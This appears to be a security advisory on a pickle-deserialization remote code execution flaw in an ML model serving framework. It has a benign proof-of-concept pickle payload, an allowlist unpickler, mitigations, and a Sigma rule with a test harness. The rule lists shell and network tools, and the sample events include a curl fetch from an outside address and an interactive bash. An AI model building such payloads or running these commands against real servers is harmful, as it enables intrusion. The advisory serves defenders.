Critical RCE in Popular ML Model Serving Framework — CVE-2026-24817
A critical unauthenticated remote code execution (RCE) vulnerability has been identified in the model loading subsystem of a widely-deployed open-source ML model serving framework. The vulnerability stems from unsafe deserialization of model files using Python’s pickle module, allowing an attacker who can supply a crafted model file to achieve arbitrary code execution on the serving host.
Vulnerability Details
| Field | Detail |
|---|---|
| CVE | CVE-2026-24817 |
| CVSS Score | 9.8 (Critical) |
| Attack Vector | Network |
| Authentication | None required |
| User Interaction | None |
| Affected Component | Model loading endpoint |
| Exploit Available | Yes — public PoC |
Root Cause
The framework’s model loading endpoint accepts serialized model files in Python pickle format without validation or sandboxing. Pickle deserialization is inherently unsafe: a pickle stream can name any importable callable and have it invoked with attacker-chosen arguments while the file is being loaded (this is exactly what a class’s `__reduce__` hook emits), so a crafted file grants code execution in the context of the serving process before any model object even exists.
This class of vulnerability has been well-documented in the ML security community since at least 2021, with Hugging Face explicitly warning against loading untrusted pickle files. Despite this, numerous frameworks and models continue to use pickle as a default serialization format.
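The mechanism in miniature, as an added example that is not code from the affected framework or its vendor: a pickled object whose `__reduce__` names a callable runs that callable inside whatever process calls `pickle.loads`. The payload here calls the harmless `os.getcwd` so it can be run safely; a real payload names `os.system` or `subprocess.Popen` with a shell command. Beside it is an allowlist unpickler of the kind the Python documentation describes; `LegitModel`, `ALLOWED_GLOBALS` and the loader names are assumptions of this example.

```python
import io
import os
import pickle


class LegitModel:
    """Stand-in for a benign pickled model object (constructed for this example)."""

    def __init__(self, weights):
        self.weights = weights


class MaliciousModel:
    """A 'model' whose pickle runs attacker-chosen code when it is loaded.

    pickle serialises an object with __reduce__ as 'call this callable with
    these arguments'. The callable here is os.getcwd, which is harmless but
    proves the point: it executes inside the process that calls pickle.loads,
    before any model object exists. A real payload names os.system,
    subprocess.Popen or similar with a reverse-shell command line.
    """

    def __reduce__(self):
        return (os.getcwd, ())


def legit_blob() -> bytes:
    return pickle.dumps(LegitModel(weights=[0.1, 0.2]))


def malicious_blob() -> bytes:
    return pickle.dumps(MaliciousModel())


def naive_load(blob: bytes):
    """What an endpoint that calls pickle.loads on an upload effectively does.

    Returns whatever the stream constructs; for malicious_blob() that is the
    return value of os.getcwd(), i.e. the attacker's callable has already run.
    """
    return pickle.loads(blob)


# Only the globals a legitimate model file needs (assumed set for this example).
# Anything else (os.system, subprocess.Popen, builtins.eval, ...) is refused
# before it is imported.
ALLOWED_GLOBALS = {
    (LegitModel.__module__, "LegitModel"),
    ("collections", "OrderedDict"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """Allowlist-based unpickler.

    find_class is the single hook through which the GLOBAL and STACK_GLOBAL
    opcodes resolve names, so refusing here stops the import of any callable
    that is not on the allowlist.
    """

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to import {module}.{name}")


def restricted_load(blob: bytes):
    return RestrictedUnpickler(io.BytesIO(blob)).load()


if __name__ == "__main__":
    print("naive load of crafted file returned:", naive_load(malicious_blob()))
    print("restricted load of legit file:", restricted_load(legit_blob()).weights)
    try:
        restricted_load(malicious_blob())
    except pickle.UnpicklingError as exc:
        print("restricted load of crafted file:", exc)
```

An allowlist unpickler is defense in depth, not a fix: bypasses through allowlisted modules have been found repeatedly, and the allowlist must track every class a real model file legitimately references. The durable answer is a format that carries no code at all, which is why the vendor fix moves to safetensors.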
Exploitation
A proof-of-concept exploit has been publicly disclosed. Exploitation requires the ability to submit a model file to the serving endpoint — in default configurations, this endpoint is unauthenticated and exposed on port 8080.
Observed attack chain:
- Attacker sends a POST request to `/api/v1/models/load` with a crafted pickle payload
- Framework deserializes the payload during model registration
- Attacker’s code executes in the serving process — typically running as root or a service account
- Attacker establishes reverse shell or drops persistent backdoor
Active exploitation in the wild has been confirmed by multiple threat intelligence vendors, primarily targeting misconfigured cloud instances with the model serving port exposed to the internet.
Affected Versions
Versions prior to the patched release are affected. Consult the vendor advisory for the specific version range — patch notes reference “unsafe pickle loading in model registry endpoint.”
Mitigations
Immediate actions:
- Apply the vendor patch. The fix replaces pickle deserialization with `safetensors` for model loading and adds authentication to the model registry endpoint.
- Restrict network access. Firewall the model serving port; it should never be exposed to the internet without authentication.
- Audit model sources — only load models from trusted, verified sources. Treat model files as executable code.
- Monitor for anomalous process spawning — look for child processes spawned by the ML serving process, particularly shells or network tools.
Detection (Sigma):

```yaml
title: Suspicious Child Process from ML Model Serving Framework
logsource:
  product: linux
  category: process_creation
detection:
  selection:
    ParentImage|endswith: ['/python3', '/uvicorn', '/gunicorn']
    Image|endswith: ['/bash', '/sh', '/curl', '/wget', '/nc']
  condition: selection
level: high
```

Expect noise from `python3` parents that legitimately spawn shells (build tooling, cron jobs, developer sessions); scope the rule to the serving account or the serving process’s command line before deploying it at `high`. Note also that `endswith` is literal: a versioned interpreter path such as `/usr/bin/python3.11` does not end with `/python3` and will not match as written.
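The rule’s matching logic run over constructed process-creation events, as an added example that is not part of the original advisory. The field names follow a Sysmon-for-Linux-style layout, the `mlserve` service account, the event ids and the `203.0.113.7` address are all assumptions, and the tuned variant (versioned interpreter names, scoping to the serving account) is this example’s suggestion rather than the published rule.

```python
import json
import re

# Field/value logic of the published Sigma rule, expressed as plain code.
SUSPICIOUS_PARENTS = ("/python3", "/uvicorn", "/gunicorn")
SUSPICIOUS_CHILDREN = ("/bash", "/sh", "/curl", "/wget", "/nc")


def rule_matches(event: dict) -> bool:
    """Literal reading of the rule.

    Sigma `field|endswith: [a, b]` means 'field ends with any listed value';
    two fields under one `selection` are ANDed.
    """
    parent = event.get("ParentImage", "")
    image = event.get("Image", "")
    return parent.endswith(SUSPICIOUS_PARENTS) and image.endswith(SUSPICIOUS_CHILDREN)


# Tuned variant (an assumption of this example): accept versioned interpreter
# paths such as /usr/bin/python3.11 and require the serving account, which
# drops developer shells spawned from unrelated python3 processes.
INTERPRETER_RE = re.compile(r"/(python3(\.\d+)?|uvicorn|gunicorn)$")


def tuned_rule_matches(event: dict, serving_user: str = "mlserve") -> bool:
    parent = event.get("ParentImage", "")
    image = event.get("Image", "")
    return (
        bool(INTERPRETER_RE.search(parent))
        and image.endswith(SUSPICIOUS_CHILDREN)
        and event.get("User") == serving_user
    )


def find_matches(log_lines, predicate=rule_matches):
    """Return the ids of JSON process_creation events that trigger `predicate`."""
    hits = []
    for line in log_lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        if predicate(event):
            hits.append(event["EventId"])
    return hits


# Constructed sample events; not real telemetry from any incident.
SAMPLE_LOG = """
{"EventId": "e1", "ParentImage": "/usr/bin/python3", "Image": "/bin/sh", "CommandLine": "sh -c id", "User": "mlserve"}
{"EventId": "e2", "ParentImage": "/usr/bin/python3", "Image": "/usr/bin/git", "CommandLine": "git status", "User": "dev"}
{"EventId": "e3", "ParentImage": "/usr/local/bin/uvicorn", "Image": "/usr/bin/curl", "CommandLine": "curl http://203.0.113.7/x", "User": "mlserve"}
{"EventId": "e4", "ParentImage": "/bin/bash", "Image": "/usr/bin/python3", "CommandLine": "python3 train.py", "User": "dev"}
{"EventId": "e5", "ParentImage": "/usr/bin/python3.11", "Image": "/bin/bash", "CommandLine": "bash -i", "User": "mlserve"}
{"EventId": "e6", "ParentImage": "/usr/bin/python3", "Image": "/bin/bash", "CommandLine": "bash -c 'make test'", "User": "dev"}
"""


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    print("published rule :", find_matches(lines))                      # e1, e3, e6
    print("tuned variant  :", find_matches(lines, tuned_rule_matches))  # e1, e3, e5
```

The two result sets show the trade-off in one run: the literal rule flags the developer’s `make test` shell (e6) and misses the `python3.11` parent (e5); the tuned variant catches e5 and drops e6 because it is not the serving account. Whichever you deploy, validate it against a day of your own process telemetry before setting the level.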